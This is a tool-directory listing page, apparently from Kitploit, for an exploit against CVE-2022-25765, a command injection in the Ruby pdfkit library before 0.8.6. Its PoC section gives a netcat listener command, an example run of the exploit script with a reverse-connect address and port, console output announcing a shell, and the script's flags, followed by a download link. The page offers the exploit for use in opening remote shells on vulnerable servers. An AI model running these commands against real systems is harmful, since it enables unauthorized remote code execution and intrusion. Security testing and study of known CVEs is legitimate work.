Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
PDFkit-CMD-Injection-CVE-2022-25765 — Exploit for CVE-2022-25765 command injection in pdfkit < 0.8.6 | Kitploit
Tools/GitHubGitHub/nikn0laty/pdfkit-cmd-injection-cve-2022-25765
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and Control
GitHubnikn0laty/pdfkit-cmd-injection-cve-2022-25765

PDFkit-CMD-Injection-CVE-2022-25765

Exploit for CVE-2022-25765 command injection in pdfkit < 0.8.6

View Repository

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
1063 years agoNot yet reviewed

PDFkit-CMD-Injection (CVE-2022-25765)

Exploit for CVE-2022-25765 command injection in pdfkit < 0.8.6

See more details about the vulnerability here

PoC

Run the netcat on your host:

root@kitploit:~
$ nc -lvnp 1337

Run the exploit (example):

root@kitploit:~
$ ./CVE-2022-25765.py -t http://localhost -a 10.10.14.122 -p 1337
[*] Input target address is http://localhost
[*] Input address for reverse connect is 10.10.14.122
[*] Input port is 1337
[!] Run the shell... Press Ctrl+C after successful connection

Flags:

root@kitploit:~
-t, --target  Address of target in http-format
-a, --addr    Address for reverse connect
-p, --port    Port for reverse connect, 9001 by default       
Download Tool